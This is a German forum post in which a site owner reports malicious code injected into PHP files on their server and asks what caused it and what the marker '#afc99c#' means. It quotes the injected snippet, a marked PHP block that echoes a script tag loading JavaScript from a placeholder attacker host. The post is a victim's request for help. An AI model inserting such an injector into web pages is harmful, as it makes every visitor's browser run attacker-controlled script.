Hallo,
folgender Schadcode hat sich in einigen PHP-Dateien auf meinem Server eingenistet. Der Code wurde meist unter den bestehenden Code geschrieben.
Ich habe alle Eingabefelder auf ausreichende Validierung überprüft. Auch in der Datenbank sind keine auffälligen Einträge, daher schließe ich auch eine SQL-Injection aus.
Was mich verwundert, auch statische Seiten sind betroffen. Weiß vielleicht jemand was dieses "#afc99c#" zu bedeuten hat und ob das ein Hinweis auf die Schwachstelle geben kann?
Ich bin grad ziemlich ratlos wie der Schadcode da hingekommen ist und bin für jeden Hinweis dankbar.
Viele Grüße
folgender Schadcode hat sich in einigen PHP-Dateien auf meinem Server eingenistet. Der Code wurde meist unter den bestehenden Code geschrieben.
PHP-Code:
<?php
#afc99c#
if(empty($j)) {
$j = "<script type=\"text/javascript\" src=\"http://pfad.zu/boesem/script.js\"></script>";
echo $j;
}
#/afc99c#
?>
Was mich verwundert, auch statische Seiten sind betroffen. Weiß vielleicht jemand was dieses "#afc99c#" zu bedeuten hat und ob das ein Hinweis auf die Schwachstelle geben kann?
Ich bin grad ziemlich ratlos wie der Schadcode da hingekommen ist und bin für jeden Hinweis dankbar.
Viele Grüße
Kommentar